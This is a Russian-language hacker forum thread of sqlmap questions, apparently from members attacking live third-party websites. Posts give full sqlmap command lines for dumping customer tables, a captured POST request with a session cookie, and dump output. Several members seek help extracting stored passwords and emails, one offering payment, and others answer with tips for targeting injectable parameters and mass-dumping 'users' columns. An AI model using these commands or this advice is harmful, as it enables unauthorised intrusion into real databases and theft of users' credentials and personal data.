Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    303
    Likes Received:
    143
    Reputations:
    2
    Попадались мне тоже пробелы в MSSQL( Правда было в имени БД) помогло добавление вместо пробела %20, и мапа начала крутить без проблем. По идее должно для всего работать.
    Code:
    ./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C Customer%20Group --where="'Customer%20Group' IS NOT NULL" --dump --threads=10 -v 3
    
    так по пробуй.
     
    #961 karkajoi, 5 Nov 2019
    Last edited: 5 Nov 2019
  2. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    34
    Likes Received:
    2
    Reputations:
    0
    уж не знаю, в чем там дело.
    --where="Customer%20Group=General" - не работает (в любых комбинациях, и да General значения там есть)
    --where="Email LIKE '%@site.com'" - прекрасно работает
     
  3. xCharley88x

    xCharley88x New Member

    Joined:
    6 Nov 2019
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Доброго времени суток
    есть проблемма с выводом из базы
    +-------------------+-------------+
    | Column | Type |
    +-------------------+-------------+
    | aPass | blob |

    --hex и --no-cast не подходят,меняется вывод но проблемма не решается
    --binary-fields тоже
    пассы судя по всему в открытом виде не хэш
    есть тут кто может помочь?
    за помощ отблагодарю!
     
  4. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    797
    Reputations:
    841
    пробуйте с начало руками, смотрите в чем проблема, может своими запросами получится через --sql-shell, думаю что какой-то косяк с кодировкой что бьет вывод
     
    _________________________
  5. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    1,986
    Likes Received:
    871
    Reputations:
    198
    blob выводится через --hex так в чем проблема то?
     
    _________________________
  6. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    34
    Likes Received:
    2
    Reputations:
    0
    Народ, кто встречал такое:
    Извлекаю уже на третьем сайте, подобную хрень:
    ?t?1f?????F/???|????6(?\\R?jGa??,b?`???????
    Соль такого формата
    -121880803
    либо положительное значение.

    Пробовал закинуть свой пас и извлечь хэш, получил тоже самое.
    закинул в базу пароль: 123qwe
    получил его хэш: ?;\n?p????x=A?F??)9???hR??Pr????q??

    Кто встречал подобное? Грешил на язык, но вроде и сайты англоязычные и это же хэш) они бывают на других языках? ) Сори не так давно работаю с хэш функциями, не во всем разб
     
    #966 Estet, 7 Nov 2019
    Last edited: 7 Nov 2019
  7. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Сканер нашел уязвимость,но я с таким столкнулся впервые
    Code:
    -u "https://site.com/user_save.php" -p "county_id" --risk="3" --method="POST" --data="--31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22forename%22
    
    Smith
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22surname%22
    
    Smith
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22email%22
    
    [email protected]
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22new_pass%22
    
    [email protected]
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22retype_pass%22
    
    [email protected]
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22county_id%22
    
    test
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22town_id%22
    
    893
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22phone%22
    
    3
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22mobile%22
    
    3
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22terms_conditions%22
    
    on
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22subscribe_emails%22
    
    on
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22g-recaptcha-response%22
    
    10000000146
    --31ed9d031d5848e3a524ba24f417a44b
    Content-Disposition: form-data; name=%22submit%22
    
    Create Account
    --31ed9d031d5848e3a524ba24f417a44b--
    " --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36" --cookie="PHPSESSID=vorccgbo8prl78srfaqavg0map" --headers="Host:www.site.com\nCache-Control:no-cache\nReferer:https://site.com/user_save.php\nAccept:text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\nAccept-Language:en-us,en;q=0.5\nX-Scanner:Netsparker\nAccept-Encoding:gzip, deflate\nContent-Type:multipart/form-data; boundary=31ed9d031d5848e3a524ba24f417a44b" --dbms="MySQL"
    Пробую через sqlmap - получаю такую ошибку:
    [CRITICAL] all testable parameters you provided are not present within the given request data

    Как правильно скормить в sqlmap?
     
  8. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    797
    Reputations:
    841
    Правильно сложите весь пакет запроса в файл и подключите его через параметр: sqlmap.py -r file.txt
     
    _________________________
    vladF likes this.
  9. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Такая же ошибка вылетает.. Подскажите, как "Правильно сложить весь пакет"? Может я что-то не так делаю..
     
  10. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    797
    Reputations:
    841
    зайти на этот урл, и сделай то действие чтоб перехватить запрос, так полагаю это сохранение по название скрипта, перехватываешь тело запроса и кладешь в файлик, а дальше этот файлик скармливаешь скульмапу, если известен уязвимый параметр, то помечаешь его * чтоб скульмап зря не тратил время на другие параметры и сразу обратился к нему.
     
    _________________________
    vladF likes this.
  11. fandor9

    fandor9 Active Member

    Joined:
    16 Nov 2018
    Messages:
    218
    Likes Received:
    225
    Reputations:
    8
    честно говоря, сам не встречался с таким, но судя по выводу похоже что мап выдаёт вам сразу бинарные данные (байты), а ваша консоль конвертирует их сразу в ASCII. И тогда вы получаете вот такую вот хрень. Можете попробовать прогнать мап через локальный веб-прокси (Burp и прочее) и посмотреть что там вам выдаёт мап.
     
  12. jakonda1001

    jakonda1001 New Member

    Joined:
    17 Mar 2016
    Messages:
    181
    Likes Received:
    4
    Reputations:
    0
    блин не пойму как сдампить только мыльники и пароли (не проверяя в какой они таблице, если есть) (просто пример любой на вскидку, дальше по аналогии пойму)
     
  13. Goore

    Goore New Member

    Joined:
    30 Mar 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Server:

    web server operating system: Windows 10 or 2016
    web application technology: ASP.NET, Microsoft IIS 10.0, ASP
    back-end DBMS: active fingerprint: Microsoft SQL Server 2017

    Parameter: #1* ((custom) POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)


    sqlmap udalos vitashits DB list(55 Dbs) - no kogda delaesh -D db --tables, srazu pokazivaet redirekt na orginal sait www.sait.com - i ne daet vitashits tablici, sto delats?
    databases udalos vitashits tolka s --no-cast

    "sqlmap got a 302 redirect to 'http://www.sait.com'. Do you want to follow? [Y/n]"
    kogda vitaskival DB ne prosilo takoe, i vse skachalos norm
     
  14. Goore

    Goore New Member

    Joined:
    30 Mar 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    [12:46:13] [INFO] fetching tables for database: ev
    [12:46:13] [INFO] heuristics detected web page charset 'ascii'
    [12:46:13] [WARNING] the SQL query provided does not return any output
    [12:46:13] [WARNING] it was not possible to count the number of entries for the SQL query provided. sqlmap will assume that it returns only one entry
    [12:46:14] [WARNING] the SQL query provided does not return any output
    [12:46:14] [CRITICAL] unable to retrieve the tables for any database
    [12:46:14] [WARNING] HTTP error codes detected during run:
    500 (Internal Server Error) - 1 times
     
  15. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    159
    Likes Received:
    41
    Reputations:
    2
    да
     
  16. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    275
    Likes Received:
    111
    Reputations:
    25
    Sqlmap перестал работать, не видит ключи
    sqlmap.py -hh
    sqlmap.py --update

    В любом случае
    Code:
    Usage: sqlmap.py [options]
    
    sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --
    list-tampers, --wizard, --update, --purge or --dependencies). Use -h for basic a
    nd -hh for advanced help
    
    
    Press Enter to continue...
    Что отвалилось ?
     
  17. Vinc

    Vinc Member

    Joined:
    7 Nov 2010
    Messages:
    97
    Likes Received:
    24
    Reputations:
    0
    проще заново скачать в другую папку и запустить
     
  18. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    159
    Likes Received:
    41
    Reputations:
    2
    бывает ломается python, как вариант переустановить оба.
     
  19. dmjROV

    dmjROV New Member

    Joined:
    8 Nov 2008
    Messages:
    1
    Likes Received:
    2
    Reputations:
    0
    Всем привет.
    Как составить запрос в sqlmap, что бы он брал колонки с таблиц в которых содержится "*_users", то есть префиксы бывают разные (blabla1_users, blabla2_users и тд), чувствую что надо как то играться с параметром -T --where, буду очень благодарен за помощь.
     
  20. sosidzh24

    sosidzh24 New Member

    Joined:
    10 Apr 2019
    Messages:
    55
    Likes Received:
    3
    Reputations:
    0
    Если я правильно понял, то --search -C "users". Далее выбрать первый вариант или все поставить на --batch .Тогда он сдампит все колонки где названии рисутствует "users"
     
Loading...